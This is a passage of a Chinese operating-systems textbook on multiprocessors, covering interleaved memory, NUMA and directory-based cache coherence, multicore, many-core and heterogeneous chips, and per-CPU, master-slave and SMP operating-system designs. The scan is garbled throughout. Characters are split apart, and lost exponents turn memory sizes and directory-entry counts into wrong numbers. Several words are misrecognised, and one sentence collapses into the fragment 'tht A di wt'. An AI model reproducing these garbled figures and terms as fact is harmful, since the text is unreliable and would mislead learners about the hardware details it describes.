不 是 每 组 请 求 都 可 被 同时 处 理 。 冲 突 可 在 一 条 连 线 或 一 个 开关 中 发 生 ， 也 可 在 对 存储 器 的 请 求 和 来 自 存 
储 器 的 应 答 中 产生 。 

人 们 和 希望 各 模块 对 存储 器 的 引用 是 均匀 的 ， 为 此 通常 使 用 一 种 把 低位 作为 模块 号 的 技术 。 例 如 ， 考 
虑 一 台 经 常 访问 32 位 字 的 计算 机 中 面向 字 节 的 地 址 空间 ， 低 位 通常 是 00， 但 接 下 来 的 3 位 会 均匀 地 分 布 。 
将 这 3 位 作为 模块 号 ， 连 续 的 字 会 放 在 连续 的 模块 中 。 而 连续 字 被 放 在 不 同 模块 里 的 存储 器 系统 被 称 作 
交叉 (interleaved) 存储 器 系统 。 交 叉 存 储 器 将 并 行 运行 的 效率 最 大 化 了 ， 这 是 因为 多 数 对 存储 器 的 引 
用 是 连续 编 址 的 。 设 计 非 阻塞 的 交换 网 络 也 是 有 可 能 的 ， 在 这 种 网 络 中 ， 提 供 了 多 条 从 每 个 CPU 到 每 个 
存储 器 的 路 径 ， 从 而 可 以 更 好 地 分 散 流量 。 

4. NUMA 多 处 理 机 

单 总 线 UMA 多 处 理 机 通常 不 超过 几 十 个 CPU ， 而 交叉 开关 或 交换 网 络 多 处 理 机 需要 许多 (昂贵 ) 
的 硬件 ， 所 以 规模 也 不 是 那么 大 。 要 想 超 过 100 个 CPU 还 必须 做 些 让 步 。 通 常 ， 一 种 让 步 就 是 所 有 的 存 
储 器 模块 都 具有 相同 的 访问 时 间 。 这 种 让 步 导致 了 前 面 所 说 的 NUMA 多 处 理 机 的 出 现 。 像 UMA 一 样 ， 
这 种 机 器 为 所 有 的 CPU 提供 了 一 个 统一 的 地 址 空间 ， 但 与 UMA 机 器 不 同 的 是 ， 访 问 本 地 存储 器 模块 快 
于 访问 远程 存储 器 模块 。 因 此 ， 在 NUMA 机 器 上 运行 的 所 有 UMA 程 序 无 须 做 任何 改变 ， 但 其 性 能 不 如 
UMA 机 器 上 的 性 能 。 

所 有 NUMA 机 器 都 具有 以 下 三 种 关键 特性 ， 它 们 是 NUMA 与 其 他 多 处 理 机 的 主要 区 别 : 

1) 具有 对 所 有 CPU 都 可 见 的 单个 地 址 空间 。 

2) 通过 LOAD 和 STORE 指令 访问 远程 存储 器 。 

3) 访问 远程 存储 器 慢 于 访问 本 地 存储 器 。 

在 对 远程 存储 器 的 访问 时 间 不 被 隐藏 时 (因为 没有 高 速 缓 存 )， 系 统 被 称 为 NC-NUMA (No Cache 
NUMA, ， 无 高 速 缓 存 NUMA ) 。 在 有 一 致 性 高 速 缓 存 时 ， 系 统 被 称 为 CC-NUMA (Cache-Coherent 
NUMA， 高 速 缓存 一 致 NUMA ) 。 

目前 构造 大 型 CC-NUMA 多 处 理 机 最 常见 的 方法 是 基于 目录 的 多 处 理 机 (directory-based 
multiprocessor)。 其 基本 思想 是 ， 维 护 一 个 数据 库 来 记录 高 速 缓 存 行 的 位 置 及 其 状态 。 当 一 个 高 速 缓 存 
行 被 引用 时 ， 就 查询 数据 库 找 出 高 速 缓存 行 的 位 置 以 及 它 是 “干净 ”的 还 是 “ 脏 ” 的 。 由 于 每 条 访问 存 
储 器 的 指令 都 必须 查询 这 个 数据 库 ， 所 以 它 必 须 配 有 极 高 速 的 专用 硬件 ， 从 而 可 以 在 一 个 总 线 周 期 的 几 
分 之 一 内 作出 响应 。 

我 们 通过 一 个 例子 来 具体 考虑 多 个 处 理 机 的 想法 ， 一 个 256 个 节点 的 系统 ， 每 个 节点 包括 一 个 CPU 
和 通过 局 部 总 线 连接 到 CPU 上 的 16MB 的 RAM。 整 个 存储 器 有 2” 字 节 ， 被 划分 成 2* 个 64 字 节 大 小 的 高 速 
缓存 行 。 存 储 器 被 静态 地 在 节点 间 分 配 ， 节 点 0 是 0~16M， 节 点 1 是 16~32M， 等 等 。 节 点 通过 互连网 络 
连接 ， 参 见 图 8-6a。 每 个 节点 还 有 用 于 构成 其 2“ 字 节 存 储 器 的 2* 个 64 字 节 高 速 缓存 行 的 目录 项 。 此 刻 ， 
我 们 假定 一 行 最 多 被 一 个 高 速 缓存 使 用 。 

为 了 了 解 目 录 是 如 何 工 作 的 , 让 我 们 跟踪 引用 了 一 个 高 速 缓存 行 的 发 自 CPU 20 的 LOAD 指 令 。 首先 ， 
发 出 该 指令 的 CPU 把 它 交 给 自己 的 MMU， 被 翻译 成 物理 地 址 ， 比 如 说 ，0x24000108。MMU 将 这 个 地 址 
拆 分 为 三 个 部 分 ， 如 图 8-6b 所 示 。 这 三 个 部 分 按 十 进 制 是 节点 36、 第 4 行 和 偏 移 量 8。MMU 看 到 引用 的 
存储 器 字 来 自 节点 36， 而 不 是 节点 20， 所 以 它 把 请 求 消 息 通 过 互连网 络 发 送 到 该 高 速 缓存 行 的 主 节点 
(home node) 36 上 ， 询 问 行 4 是 否 被 高 速 缓存 ， 如 果 是 ， 高 速 缓存 在 何 处 。 
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图 8-6 a) 256 个 节点 的 基于 目录 的 多 处 理 机 ，b) 32 位 存储 器 地 址 划分 的 域 ，c) 节点 36 中 的 目录 


当 请 求 通过 互连网 络 到 达 节 点 36 时 ， 它 被 路 由 至 目录 硬件 。 硬 件 检 索 其 包含 2* 个 表 项 的 目录 表 (其 
中 的 每 个 表 项 代表 一 个 高 速 缓存 行 ) 并 解析 到 项 4。 从 图 8-6c 中 ， 我们 可 以 看 到 该 行 没 有 被 高 速 缓 存 ， 所 
以 硬件 从 本 地 RAM 中 取出 第 4 行 ， 送 回 给 节点 20， 更 新 目录 项 4， 指 出 该 行 目 前 被 高 速 缓存 在 节点 20 处 。 

现在 来 考虑 第 二 个 请 求 ， 这 次 访问 节点 36 的 第 2 行 。 在 图 8-6c 中 ， 我 们 可 以 看 到 这 一 行 在 节点 82 处 
被 高 速 缓存 。 此 刻 硬件 可 以 更 新 目录 项 2， 指 出 该 行 现在 在 节点 20 上 ， 然 后 送 一 条 消息 给 节点 82， 指 示 
把 该 行 传 给 节点 20 并 且 使 其 自身 的 高 速 缓存 无 效 。 注 意 ， 即 使 一 个 所 谓 “ 共 享 存储 器 多 处 理 机 ”， 在 下 
层 仍然 有 大 量 的 消息 传递 。 

让 我 们 顺便 计算 一 下 有 多 少 存储 器 单元 被 目录 占用 。 每 个 节点 有 16 MB 的 RAM， 并 且 有 22 个 9 位 的 
目录 项 记录 该 RAM。 这 样 目 录 上 的 开支 大 约 是 9 x 2” 位 除 以 16 MB ， 即 约 1.76% ， 一 般 而 言 这 是 可 接受 
的 (尽管 这 些 都 是 高 速 存储 器 ， 会 增加 成 本 )。 即 使 对 于 32 字 节 的 高 速 缓 存 行 ， 开 销 也 只 有 4%。 至 于 
128 字 节 的 高 速 缓 存 行 ， 它 的 开销 不 到 1%。 

该 设计 有 一 个 明显 的 限制 ， 即 一 行 只 能 被 一 个 节点 高 速 缓存 。 要 想 允 许 一 行 能 够 在 多 个 节点 上 被 高 
速 缓存 ， 我 们 需要 某 种 对 所 有 行 定 位 的 方法 ， 例 如 ， 在 写 操作 时 使 其 无 效 或 更 新 。 在 多 数 多 核 处 理 器 上 ， 
一 个 目录 项 由 一 个 位 向 量 组 成 ， 位 向 量 的 每 位 对 应 一 个 核 。“1” 表 示 该 核 上 缓存 有 效 ， 而 “0” 表 示 缓 
存 已 失效 。 通 常 每 个 目录 项 都 包含 多 个 位 ， 这 就 导致 了 目录 的 内 存 成 本 大 大 增加 。 

5. 多 核 芯片 

随 着 芯片 制造 技术 的 发 展 ， 晶 体 管 的 体积 越 来 越 小 ， 从 而 有 可 能 将 越 来 越 多 的 晶体 管 放 入 一 个 芯片 
中 。 这 个 基于 经 验 的 发 现 通常 称 为 摩尔 定律 (Moore’s Law) ， 得 名 于 首次 发 现 该 规律 的 Intel 公 司 创始 人 
之 一 Gordon Moore, Intel Core 2 Duo 系 列 芯 片 已 包含 了 3 亿 数 量 级 的 晶体 管 。1974 年 ，Intel 的 8080 芯 片 
包含 了 2000 多 个 晶体 管 ， 而 至 强 Nehalem-EX 处 理 器 包含 超过 20 亿 个 晶体 管 。 

随 之 一 个 显而易见 的 问题 是 :“ 你 怎么 利用 这 些 晶体 管 ? ”按照 我 们 在 第 1.3.1 小 节 的 讨论 ， 一 个 选 
择 是 给 芯片 添加 数 净 字 节 的 高 速 缓存 。 这 个 选择 是 认真 的 ， 带 有 4 兆 字 节 片 上 高 速 缓 存 的 芯片 现在 已 经 
很 常见 ， 并 且 带 有 更 多 片上 高 速 缓存 的 芯片 也 即将 出 现 。 但 是 到 了 某 种 程度 ， 再 增加 高 速 缓存 的 大 小 只 
能 将 命中 率 从 99% 提 高 到 99.5%， 而 这 样 的 改进 并 不 能 显著 提升 应 用 的 性 能 。 

另 一 个 选择 是 将 两 个 或 者 多 个 完整 的 CPU， 通 常 称 为 核 (core) ， 放 到 同一 个 芯片 上 (技术 上 来 说 是 同一 
个 小 硅 片 )。 双 核 、 四 核 和 八 核 的 芯片 已 经 很 普及 了 ， 甚 至 可 以 买 到 带 有 上 百 个 核 的 芯片 ， 并 且 还 有 更 多 
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核 的 CPU 正在 研发 中 。 在 多 核 芯片 中 ， 缓 存 仍然 是 至 关 重 要 的 ， 并 且 遍 布 整个 世 片 。 例 如 ， 英 特 尔 至 强 
2651 拥 有 12 个 物理 超 线程 核 ，24 个 虚拟 核 。 这 12 个 物理 核 中 的 每 一 个 都 有 着 32 KB 的 LI1 指 令 缓存 、L1 数 
据 缓存 的 32 KB 和 256 KB 的 L2 缓 存 。 最 后 ，12 个 核 共享 30 MB 的 L3 缓 存 。 

虽然 CPU 可 能 共享 高 速 缓存 或 者 不 共享 (如 图 1-8 所 示 )， 但 是 它们 都 共享 内 存 。 考 虑 到 每 个 内 存 字 
总 是 有 唯一 的 值 ， 这 些 内 存 是 一 致 的 。 特 殊 的 硬件 电路 可 以 确保 在 一 个 字 同 时 出 现在 两 个 或 者 多 个 的 高 
速 缓存 中 的 情况 下 ， 当 其 中 某 个 CPU 修 改 了 该 字 ， 所 有 共 他 高 速 缓 存 中 的 该 字 都 会 被 自动 地 并 且 原 子 性 
地 删除 来 确保 一 致 性 。 这 个 过 程 称 为 窥 探 (snooping). 

这 样 设计 的 结果 是 多 核 芯片 就 相当 于 小 得 多 处 理 机 。 实 际 上 ， 多 核 芯片 时 常 被 称 为 片 级 多 处 理 机 
(Chip-level MultiProcessors，CMP)。 从 软件 的 角度 来 看 ，CMP 与 基于 总 线 的 多 处 理 机 和 使 用 交换 网 络 
的 多 处 理 机 并 没有 太 大 的 差别 。 不 过 ， 它 们 还 是 存在 着 一 些 不 同 。 例 如 ， 对 基于 总 线 的 多 处 理 机 ， 每 个 
CPU 拥有 自己 的 高 速 缓存 ， 如 图 8-2b 以 及 图 1-8b 的 AMD 设 计 所 示 。 在 图 1-8a 所 示 的 Intel 使 用 的 共享 高 速 
缓存 的 设计 并 没有 出 现在 其 他 的 多 处 理 机 中 。 共 享 二 级 高 速 缓存 会 影响 性 能 。 如 果 一 个 核 需 要 很 多 高 速 
缓存 空间 ， 而 另 一 个 核 不 需要 ， 这 样 的 设计 允许 它们 各 自 使 用 所 需 的 高 速 缓存 。 但 另 一 方面 ， 共 享 高 速 
缓存 也 让 一 个 贪 禁 的 核 损害 其 他 核 成 为 可 能 。 

CMP 与 其 他 更 大 的 多 处 理 机 之 间 的 另 一 个 差异 是 容错 。 因 为 CPU 之 间 的 连接 非常 紧密 ， 一 个 共享 模 
块 的 失效 可 能 导致 许多 CPU 同时 出 错 。 而 这 样 的 情况 在 传统 的 多 处 理 机 中 是 很 少 出 现 的 。 

除了 所 有 核 都 是 对 等 的 对 称 多 核 芯片 之 外 ， 还 有 一 类 常见 的 多 核 芯片 被 称 为 片上 系统 (SoC), ix 
些 芯 片 含有 一 个 或 者 多 个 主 CPU， 但 是 同时 还 包含 若干 个 专用 核 ， 例 如 视频 与 音频 解码 器 、 加 密 芯 片 、 
网 络 接口 等 。 这 些 核 共同 构成 了 完整 的 片上 计算 机 系统 。 

6. 众 核 芯片 

“多 核 ” 只 是 简单 地 表示 核 的 数量 多 于 一 个 ， 但 是 当 核 的 数目 继续 增加 时 ， 我 们 会 使 用 另 一 个 名 称 
“ 众 核 ”。 众 核 芯 片 是 指 包 括 几 十 、 几 百 甚 至 成 千 上 万 个 核心 的 多 核 处 理 器 。 尽 管 并 没有 严格 的 界限 来 区 
分 什么 情况 下 叫 “ 多 核 ”、 什 么 情况 下 叫 “ 众 核 "， 但 一 个 简单 的 区 分 方式 是 ， 如 果 你 不 介意 损失 一 两 个 
核心 ， 这 时 候 你 使 用 的 就 是 “ 众 核 ” 了 。 

像 英特尔 Xeon Phi 这 样 的 附加 加 速 卡 有 超过 60 个 x86 核 ， 其 他 供应 商 也 已 经 跨越 了 “ 百 核 ”这 个 障 
碍 ， 而 且 “ 千 核 ” 通 用 核心 也 可 能 正在 制造 中 ， 但 我 们 很 难 想象 要 拿 一 千 个 核 来 干什么 ， 更 不 用 说 对 它 
们 进行 编程 了 。 

超大 量 核 带 来 的 另 一 个 问题 是 ， 用 来 保持 缓存 一 致 性 的 机 制 会 变 得 非常 复杂 和 昂贵 。 许 多 工程 师 担 
心 缓存 的 一 致 性 可 能 无 法 扩展 到 上 百 个 核 ， 一些 人 其 至 建议 彻底 抛弃 它 。 他 们 担心 硬件 上 保持 缓存 一 致 
性 的 开销 会 很 高 ， 以 至 于 这 些 新 增 的 核 并 不 能 带 来 多 大 的 性 能 提升 ， 因 为 处 理 器 一 直 忙 于 维护 缓存 状态 
的 一 致 性 。 更 糟糕 的 是 ， 保 持 缓 存 目录 的 一 致 性 还 将 会 消耗 大 量 的 内 存 ， 这 就 是 著名 的 一 致 性 壁垒 。 

我 们 以 上 面 讨论 的 基于 目录 的 缓存 一 致 性 解决 方案 为 例 进行 讨论 。 如 果 每 个 目录 项 包含 一 个 位 向 量 
来 指示 哪些 核 包 含 了 一 个 特定 的 缓存 行 ， 那 么 对 于 一 个 有 着 1024 个 核 的 CPU 来 说 ， 目 录 项 将 至 少 有 128 
字 节 长 。 而 由 于 一 个 缓存 行 很 少 超过 128 字 节 ， 这 就 导致 了 目录 项 甚至 比 它 追 踪 的 缓存 行 还 长 的 乾 众 境 
地 ， 这 显然 不 是 我 们 希望 看 到 的 。 

一 些 工程 师 认 为 ， 唯 一 已 证 明 可 适用 于 众 核 的 编程 模型 是 采用 消息 传递 和 分 布 式 内 存 实现 的 ， 这 也 
应 该 是 我 们 对 于 未 来 的 众 核 芯片 的 期 待 。 像 英特尔 48 核 SCC 这 样 的 实验 性 处 理 器 已 经 放弃 了 缓存 一 致 性 ， 
转 而 提供 硬件 上 对 于 快速 消息 传递 的 支持 。 另 一 方面 ， 另 一 些 处 理 器 却 仍 在 更 大 数量 的 核 上 提供 缓存 一 
臻 性。 混合 的 模型 也 是 可 行 的 ， 比 如 一 个 1024 核 的 芯片 可 以 被 划分 为 64 个 区 域 ， 每 个 区 域 拥 有 16 个 缓存 
一 致 的 核 ， 但 区 域 之 间 不 保持 一 致 。 

成 千 上 万 的 核心 数 现在 已 不 再 那么 少见 了 ， 图 形 处 理 单元 (GPU) 作为 当今 最 为 常见 的 众 核 ， 存 在 
于 几乎 任何 一 台 非 嵌入 式 并 且 有 显示 器 的 计算 机 系统 中 。GPU 是 一 个 拥有 专用 内 存 和 成 千 上 万 个 微小 核 
的 处 理 器 。 与 通用 处 理 器 相 比 ，GPU 在 运算 单元 的 电路 上 预 留 了 更 多 的 晶体 管 ， 而 在 缓存 和 控制 逻辑 上 
则 更 少 。 因 而 它们 十 分 擅长 进行 像 图 形 程序 泻 染 多 边 形 这 样 的 大 量 并 行 的 小 规模 计算 ,而 不 太 擅 长 串 行 
任务 ， 同 时 也 很 难 对 它们 编程 。 尽 管 GPU 对 于 操作 系统 来 说 很 有 用 (加 密 或 者 网 络 数据 的 处 理 ) ， 但 让 
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操作 系统 自身 的 大 部 分 任务 运行 在 GPU 上 还 是 不 太 可 能 的 。 

其 他 的 计算 任务 正 越 来 越 多 地 被 GPU 所 处 理 ， 尤 其 是 科学 计算 中 常见 的 计算 型 任务 。 用 来 描述 GPU 
上 的 通用 计算 的 术语 是 一 一 正如 你 所 猜 到 的 一 一 GPGPU。 不 幸 的 是 ， 对 GPU 进 行 高 效 的 编程 是 十 分 困 
难 的 ， 并 且 需 要 OpenGL 或 NVIDIA 的 CUDA 等 特殊 的 编程 语言 。 对 GPU 编程 和 对 通用 处 理 器 编程 的 一 
个 重要 不 同 在 于 ，GPU 的 本 质 是 单 指令 多 数据 流 处 理 器 ， 这 意味 着 大 量 的 核心 在 数据 的 不 同 分 块 上 执行 
完全 相同 的 指令 。 这 样 的 一 个 编程 模型 对 于 数据 并 行 来 说 非常 棒 ， 但 是 对 于 其 他 编程 类 型 (比如 任务 并 
行 ) 并 不 是 很 合适 。 

7. 异 构 多 核 

一 些 芯 片 会 把 一 个 GPU 和 一 些 通用 处 理 器 核 封装 在 一 起 ， 许 多 片上 系统 在 通用 处 理 器 核 之 外 还 包括 
一 个 或 多 个 特殊 用 途 的 处 理 器 。 在 一 块 芯 片上 封装 了 不 同类 型 的 处 理 器 的 系统 被 统称 为 异 构 多 核 处 理 器 ， 
一 个 例子 就 是 IXP 网 络 处 理 器 系列 ， 它 最 初 由 英特尔 在 2000 年 引入 ， 之 后 周期 性 地 使 用 一 些 最 新 的 技术 
来 更 新 维护 。 典 型 的 网 络 处 理 器 包含 一 个 通用 控制 核 (比如 运行 Linux 的 ARM 处 理 器 ) 和 几 十 上 百 个 高 
度 专门 化 的 流 处 理 器 ， 这 些 流 处 理 器 十 分 擅长 处 理 网 络 数据 包 ， 但 是 其 他 的 任务 则 不 在 行 。 它 们 一 般 被 
用 在 诸如 路 由 器 、 防 火 墙 这 类 网 络 设备 上 。 路 由 网 络 数 据 包 并 不 太 需 要 浮 点 操作 ， 所 以 大 多 数 版 本 的 流 
处 理 器 都 不 包含 浮 点 单元 。 另 一 方面 ， tht A di wt 
流 处 理 器 采用 了 特殊 的 硬件 来 实现 这 一 点 。 

上 述 示 例 中 的 系统 很 明显 都 是 异 构 的 。IXP 中 的 流 处 理 器 和 控制 处 理 器 是 截然 不 同 的 ， 它 们 采用 了 
不 同 的 指令 集体 系 结 构 ， 对 于 GPU 和 通用 核心 来 说 也 是 这 样 。 然 而 在 保持 相同 指令 集体 系 结构 的 同时 引 
人 和 蜡 构 多 核 也 是 可 能 的 ， 比 如 一 个 CPU 可 以 包含 一 些 有 着 较 深 流水 线 和 更 高 的 时 钟 频率 的 “大 ” 核 ， 以 
及 一 些 更 简单 、 不 那么 强大 、 也 许 运行 在 更 低频 率 的 “小 ” 核 。 那 些 强大 的 核心 会 在 运行 有 快速 串 行 处 
理 需 要 的 代码 时 派 上 用 场 ， 而 那些 小 核 则 对 于 可 以 高 效 并 行 执行 的 任务 很 实用 。 这 种 异 构架 构 的 一 个 例 
子 就 是 ARM 的 big.LITTLE 处 理 器 系列 。 

8. 在 多 核 上 编程 

硬件 领先 软件 的 情况 过 去 就 时 常 出 现 ， 尽 管 多 核 芯 片 现在 已 经 出 现 了 ， 我 们 却 还 不 能 为 它们 编写 应 
用 程序 。 当 前 的 编程 语言 并 不 适合 编写 高 度 并 行 的 程序 ， 好 的 编译 器 和 调试 工具 也 很 少见 ， 程 序 员 很 少 
有 并 行 编程 的 经 验 ， 大 多 数 人 其 至 不 知道 可 以 把 任务 划分 为 多 个 模块 来 并 行 执行 。 同 步 、 消 除 资源 竞争 
条 件 和 避免 死 锁 等 问题 就 像 赴 梦 一 般 ， 更 不 幸 的 是 ， 如 果 不 处 理 好 这 些 问 题 性 能 就 会 受到 严重 影响 ， 信 
号 量 也 不 能 很 好 地 解决 问题 。 

除了 这 些 问题 ， 我 们 还 不 清楚 究竟 什么 样 的 应 用 才 需 要 成 百 个 (更 不 用 说 上 千 个 ) 处 理 器 核 一 一 尤 
其 是 在 家 用 环境 下 。 当 然 另 一 方面 ， 在 大 规模 服务 器 集群 中 , 通常 是 有 很 多 需要 大 量 处 理 器 核 的 任务 的 。 
比如 一 个 热门 服务 器 可 以 很 简单 地 为 每 一 个 客户 端 请 求 使 用 不 同 的 处 理 器 核 ， 同 样 上 一 节 讨 论 过 的 云 提 
供 商 也 可 以 在 这 些 核心 上 提供 大 量 的 虚拟 机 来 出 租 给 需要 计算 能 力 的 客户 们 。 


8.1.2 多 处 理 机 操作 系统 类 型 

让 我 们 从 对 多 处 理 机 硬件 的 讨论 转 到 多 处 理 机 软件 ， 特 别 是 多 处 理 机 操作 系统 上 来 。 这 里 有 各 种 可 
能 的 方法 。 接 下 来 将 讨论 其 中 的 三 种 。 需 要 强调 的 是 所 有 这 些 方法 除了 适用 于 多 核 系统 之 外 ， 同 样 适用 
于 包含 多 个 分 离 CPU 的 系统 。 

1. 每 个 CPU 有 自己 的 操作 系统 

组 织 一 个 多 处 理 机 操作 系统 的 可 能 的 最 简单 的 方法 是 ， 静 态 地 把 存储 器 划分 成 和 CPU 一 样 多 的 各 个 
部 分 ， 为 每 个 CPU 提供 其 私有 存储 器 以 及 操作 系统 的 各 自私 有 副本 。 实 际 上 mn 个 CPU 以 "个 独立 计算 机 的 
形式 运行 。 这 样 做 一 个 明显 的 优点 是 ， 人 允许 所 有 的 CPU 共享 操作 系统 的 代码 ， 而 且 只 需要 提供 数据 的 私 
有 副本 ， 如 图 8-7 所 示 。 

这 一 机 制 比 有 n 个 分 离 的 计算 机 要 好 ， 因 为 它 允 许 所 有 的 机 器 共享 一 套 磁盘 及 其 他 的 0 设备 ， 它 还 允 
许 灵活 地 共享 存储 器 。 例 如 ， 即 便 使 用 静态 内 存 分 配 ， 一 个 CPU 也 可 以 获得 极 大 的 一 块 内 存 ， 从 而 高 效 地 
执行 代码 。 另 外 ， 由 于 生产 者 能 够 直接 把 数据 写 入 存储 器 ， 从 而 使 得 消费 者 从 生产 者 写 入 的 位 置 取出 数据 ， 
因此 进程 之 间 可 以 高 效 地 通信 。 况 且 ， 从 操作 系统 的 角度 看 ， 每 个 CPU 都 有 自己 的 操作 系统 非常 自然 。 
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CPU 1 CPU 2 CPU 3 CPU 4 存储 器 VO 





图 8-7 在 4 个 CPU 中 划分 多 处 理 机 存储 器 ， 但 共享 一 个 操作 系统 代码 的 副本 。 标 有 “数据 ”字样 的 方 框 是 
每 个 CPU 的 操作 系统 私有 数据 


值得 一 提 的 是 ， 该 设计 有 四 个 潜在 的 问题 。 首 先 ， 在 一 个 进程 进行 系统 调用 时 ， 该 系统 调用 是 在 本 
机 的 CPU 上 被 捕获 并 处 理 的 ， 并 使 用 操作 系统 表 中 的 数据 结构 。 

其 次 ， 因 为 每 个 操作 系统 都 有 自己 的 表 ， 那 么 它 也 有 自己 的 进程 集合 ， 通 过 自身 调度 这 些 进 程 。 这 
里 没有 进程 共享 。 如 果 一 个 用 户 登 录 到 CPU 1， 那 么 他 的 所 有 进程 都 在 CPU 1 上 运行 。 因 此 ， 在 CPU 2 有 
负载 运行 而 CPU 1 空 载 的 情形 是 会 发 生 的 。 

第 三 ， 没 有 共享 物理 页 面 。 会 出 现 如 下 的 情形 : 在 CPU2 不 断 地 进行 页 面 调度 时 CPU 1 却 有 多 余 的 
页 面 。 由 于 内 存 分 配 是 固定 的 ， 所 以 CPU 2 无 法 向 CPU 1 借用 页 面 。 

第 四 ， 也 是 最 坏 的 情形 ， 如 果 操 作 系统 维护 近期 使 用 过 的 磁盘 块 的 缓冲 区 高 速 缓存 ， 每 个 操作 系统 
都 独自 进行 这 种 维护 工作 ,因此 ， 可 能 出 现 某 一 修改 过 的 磁盘 块 同时 存在 于 多 个 缓冲 区 高 速 缓存 的 情况 ， 
这 将 会 导致 不 一 致 性 的 结果 。 避 免 这 一 问题 的 唯一 途径 是 ， 取 消 缓冲 区 高 速 缓存 。 这 样 做 并 不 难 ， 但 是 
会 显著 降低 性 能 。 

由 于 这 些 原因 ， 上 述 模型 实际 上 很 少 使 用 ， 尽 管 它 在 早期 的 多 处 理 机 中 一 度 被 采用 ， 这 是 由 于 那 时 
的 目标 是 把 已 有 的 操作 系统 尽 可 能 快 地 移植 到 新 的 多 处 理 机 上 。 一 些 研究 工作 想 要 重新 启用 该 模型 ， 但 
还 面临 着 很 多 问题 。 在 保持 操作 系统 完全 独立 时 有 一 些 必须 考虑 的 问题 ， 如 果 每 个 处 理 器 的 所 有 状态 都 
是 其 本 地 状态 ， 那 么 就 几乎 没有 共享 ， 也 就 不 会 出 现 一 致 性 问题 或 锁 问题 。 相 反 ， 如 果 多 个 处 理 器 需要 
访问 和 修改 同一 个 进程 表 ， 锁 问题 很 快 就 变 得 复杂 起 来 (这 对 性 能 至 关 重要 )。 下 面 在 介绍 对 称 多 处 理 
机 模型 时 ， 我 们 会 更 多 地 讨论 这 个 问题 。 

2. 主 从 多 处 理 机 

图 8-8 中 给 出 的 是 第 二 种 模型 。 在 这 种 模型 中 ， 操 作 系 统 的 一 个 副本 及 其 数据 表 都 在 CPU 1 上 ， 而 不 
是 在 其 他 所 有 CPU 上 。 为 了 在 该 CPU 1 上 进行 处 理 ， 所 有 的 系统 调用 都 重 定 向 到 CPU 1 上 。 如 果 有 剩余 
的 CPU 时 间 ， 还 可 以 在 CPU 1 上 运行 用 户 进程 。 这 种 模型 称 为 主 从 模型 (master-slave) ， 因 为 CPU 1 是 
主 CPU， 而 其 他 的 都 是 从 属 CPU。 
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图 8-8 主 从 多 处 理 机 模型 
主 从 模型 解决 了 在 第 一 种 模型 中 的 多 数 问题 。 有 单一 的 数据 结构 (如 一 个 链表 或 者 一 组 优先 级 链表 ) 
用 来 记录 就 绪 进 程 。 当 某 个 CPU 空闲 下 来 时 ， 它 向 CPU 1 上 的 操作 系统 请 求 一 个 进程 运行 ， 并 被 分 配 一 
个 进程 。 这 样 ， 就 不 会 出 现 一 个 CPU 空闲 而 另 一 个 过 载 的 情形 。 类 似 地 ， 可 在 所 有 的 进程 中 动态 地 分 配 
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页 面 ， 而 且 只 有 一 个 缓冲 区 高 速 缓存 ， 所 以 决 不 会 出 现 不 一 致 的 情形 。 

这 个 模型 的 问题 是 ， 如 果 有 很 多 的 CPU， 主 CPU 会 变 成 一 个 瓶颈 。 毕 竟 ， 它 要 处 理 来 自 所 有 CPU 的 
系统 调用 。 如 果 全 部 时 间 的 10% 用 来 处 理 系 统 调 用 ， 那 么 10 个 CPU 就 会 使 主 CPU 饱 和 ， 而 20 个 CPU 就 会 使 
主 CPU 彻 底 过 载 。 可 见 ， 这 个 模型 虽然 简单 ， 而 且 对 小 型 多 处 理 机 是 可 行 的 ， 但 不 能 用 于 大 型 多 处 理 机 。 

3. 对 称 多 处 理 机 

我 们 的 第 三 种 模型 ， 即 对 称 多 处 理 机 (Symmetric MultiProcessor，SMP)， 消 除了 上 述 的 不 对 称 性 。 
在 存储 器 中 有 操作 系统 的 一 个 副本 ， 但 任何 CPU 都 可 以 运行 它 。 在 有 系统 调用 时 ， 进 行 系统 调用 的 CPU 
陷 人 内 核 并 处 理 系统 调用 。 图 8-9 是 对 SMP 模 式 的 说 明 。 
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图 8-9 SMP 多 处 理 机 模型 


这 个 模型 动态 地 平衡 进程 和 存储 器 ， 因 为 它 只 有 一 大 ,操作 系统 数据 表 。 它 还 消除 了 主 CPU 的 瓶颈 ， 
因为 不 存在 主 CPU; 但 是 这 个 模型 也 带 来 了 自身 的 问题 。 特 别 是 ， 当 两 个 或 更 多 的 CPU 同 时 运行 操作 系 
统 代 码 时 ， 就 会 出 现 灾难 。 想 象 有 两 个 CPU 同时 选择 相同 的 进程 运行 或 请 求 同 一 个 空闲 存储 器 页 面 。 处 
理 这 些 问题 的 最 简单 方法 是 在 操作 系统 中 使 用 互 斥 信号 量 ( 锁 ) ， 使 整个 系统 成 为 一 个 大 临界 区 。 当 一 
个 CPU 要 运行 操作 系统 时 ， 它 必须 首先 获得 互 斥 信号 量 。 如 果 互 斥 信号 量 被 锁 住 ， 就 得 等 待 。 按 照 这 种 
方式 ， 任 何 CPU 都 可 以 运行 操作 系统 ， 但 在 任 一 时 刻 只 有 一 个 CPU 可 运行 操作 系统 。 这 一 方法 称 为 大 内 
核 锁 (Big Kernel Lock, BLK), 

这 个 模型 是 可 以 工作 的 ， 但 是 它 几 乎 同 主 从 模式 一 样 糟糕 。 同 样 假设 ， 如 果 所 有 时 间 的 10% 花 费 在 
操作 系统 内 部 。 那 么 在 有 20 个 CPU 时 , 会 出 现 等 待 进入 的 CPU 长 队 。 幸 运 的 是 , 这 个 模型 比较 容易 改进 。 
操作 系统 中 的 很 多 部 分 是 彼此 独立 的 。 例 如 ， 在 一 个 CPU 运 行 调度 程序 时 ， 另 一 个 CPU 则 处 理 文件 系统 
的 调用 ， 而 第 三 个 在 处 理 一 个 缺 页 异常 ， 这 种 运行 方式 是 没有 问题 的 。 

由 于 这 一 事实 ， 可 以 把 操作 系统 分 割 成 互 不 影响 的 临界 区 。 每 个 临界 区 由 其 互 斥 信号 量 保护 ， 所 以 
一 次 只 有 一 个 CPU 可 执行 它 。 采 用 这 种 方式 ， 可 以 实现 更 多 的 并 行 操作 。 而 某 些 表格 ， 如 进程 表 ， 可 能 
恰巧 被 多 个 临界 区 使 用 。 例 如 ， 在 调度 时 需要 进程 表 ， 在 系统 fork 调 用 和 信号 处 理 时 也 都 需要 进程 表 。 
多 临界 区 使 用 的 每 个 表格 ， 都 需要 有 各 自 的 互 斥 信号 量 。 通 过 这 种 方式 ， 可 以 做 到 每 个 临界 区 在 任 一 个 
时 刻 只 被 一 个 CPU 执行 ， 而 且 在 任 一 个 时 刻 每 个 临界 表 (critical table) 也 只 被 一 个 CPU 访问 。 

